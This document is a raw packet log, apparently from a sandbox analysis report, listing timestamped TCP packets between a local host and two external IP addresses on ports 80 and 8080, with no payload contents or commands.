Jan 14, 2022 00:15:20.941536903 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941564083 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941584110 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941591024 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941618919 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941634893 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941646099 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941674948 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941687107 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941700935 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941728115 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941755056 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941764116 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941781998 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941798925 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941819906 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941828966 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941874981 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.941884041 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941904068 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941942930 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941970110 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941996098 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.941997051 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942007065 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942022085 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942049026 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942058086 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942075014 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942101002 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942101002 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942128897 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942156076 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942173958 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942182064 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942209005 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942209959 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942239046 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942265034 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942281008 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942286015 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942315102 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942342043 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942344904 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942365885 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942369938 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942397118 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942411900 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942424059 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942449093 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942466021 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.942476034 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942502975 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.942513943 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994396925 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994448900 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994477034 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994482994 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994515896 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994541883 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994550943 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994575024 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994594097 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994610071 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994646072 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994677067 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994687080 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994710922 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994714975 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994745016 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994777918 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994786978 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994812012 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994856119 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994857073 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994874001 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994905949 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994940042 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.994961977 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.994996071 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995043039 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995053053 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995095968 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995095968 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995124102 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995156050 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995182991 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995194912 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995234013 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995234966 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995274067 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995312929 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995343924 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995349884 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995388985 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995393991 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995426893 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995465994 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995503902 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995507956 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995541096 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995551109 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995570898 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:20.995613098 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:20.995795965 CET	49802	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:21.048037052 CET	80	49802	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.424494028 CET	49803	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.476097107 CET	80	49803	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.476222992 CET	49803	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.476447105 CET	49803	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.476465940 CET	49803	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.526734114 CET	80	49803	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.555217028 CET	80	49803	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.555433989 CET	49803	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.555748940 CET	49803	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.587785959 CET	49804	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.605916977 CET	80	49803	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.638813972 CET	80	49804	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.639050007 CET	49804	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.639090061 CET	49804	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.639097929 CET	49804	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.690476894 CET	80	49804	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.723037958 CET	80	49804	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.723335028 CET	49804	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.724524975 CET	80	49804	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.728007078 CET	49804	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.755115032 CET	49805	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.773886919 CET	80	49804	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.806344986 CET	80	49805	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.806467056 CET	49805	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.806591988 CET	49805	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.806648970 CET	49805	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.858814001 CET	80	49805	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.884705067 CET	80	49805	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.888119936 CET	49805	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.888163090 CET	49805	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.921602964 CET	49806	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.939208984 CET	80	49805	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.972542048 CET	80	49806	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:22.975950956 CET	49806	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.976190090 CET	49806	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:22.976257086 CET	49806	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:23.027368069 CET	80	49806	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:23.058175087 CET	80	49806	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:23.060168028 CET	49806	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:23.060349941 CET	49806	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:23.067600012 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.112692118 CET	80	49806	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:23.128772974 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.129806995 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.129971981 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.190661907 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192692995 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192735910 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192831039 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192864895 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.192869902 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192910910 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192949057 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192986965 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.192992926 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.193022013 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.193026066 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.193063974 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.193103075 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.193104029 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.193160057 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.253829956 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.253977060 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254020929 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254059076 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254110098 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254113913 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254170895 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254190922 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254229069 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254267931 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254268885 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254313946 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254332066 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254380941 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254420042 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254458904 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254477024 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254498959 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254513025 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254535913 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254575014 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254612923 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254630089 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254650116 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254666090 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254688978 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254726887 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254766941 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.254786968 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.254856110 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.315648079 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.315733910 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.315772057 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.315812111 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.315890074 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.315917015 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.315921068 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.315999985 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316040039 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316096067 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316122055 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316174984 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316178083 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316216946 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316253901 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316267967 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316292048 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316329956 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316382885 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316504002 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316544056 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316586971 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316612005 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316652060 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316665888 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316690922 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316786051 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316824913 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316842079 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316864967 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316878080 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.316903114 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.316998959 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317038059 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317053080 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317076921 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317091942 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317116976 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317168951 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317192078 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317213058 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317251921 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317265034 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317291021 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317329884 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317368031 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317400932 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317404985 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317430019 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317445040 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317481995 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317511082 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317521095 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317560911 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317599058 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317614079 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317636013 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317651987 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.317675114 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.317854881 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.378400087 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.378612995 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.378652096 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.378684044 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.378693104 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.378740072 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.378765106 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.378843069 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.378900051 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.378942013 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379086971 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379148960 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.379182100 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379220963 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379283905 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.379307032 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379390001 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379446983 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.379492044 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379532099 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379570007 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379600048 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379631996 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379662037 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379703045 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379730940 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.379770994 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379811049 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379817009 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.379858017 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.379872084 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379913092 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379950047 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.379988909 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.379990101 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380019903 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380028963 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380081892 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380130053 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380168915 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380250931 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380310059 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380350113 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380357027 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380395889 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380456924 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380496979 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380517006 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380569935 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380609035 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380649090 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380665064 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380688906 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380707979 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380726099 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380764961 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380821943 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380821943 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380861044 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380880117 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.380898952 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380940914 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380979061 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.380997896 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.381017923 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.381038904 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.381058931 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.381097078 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.381136894 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.381150961 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.381195068 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.442262888 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442313910 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442353010 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442410946 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442425013 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.442473888 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:23.442532063 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:23.442575932 CET	8080	49807	185.7.214.171	192.168.2.4
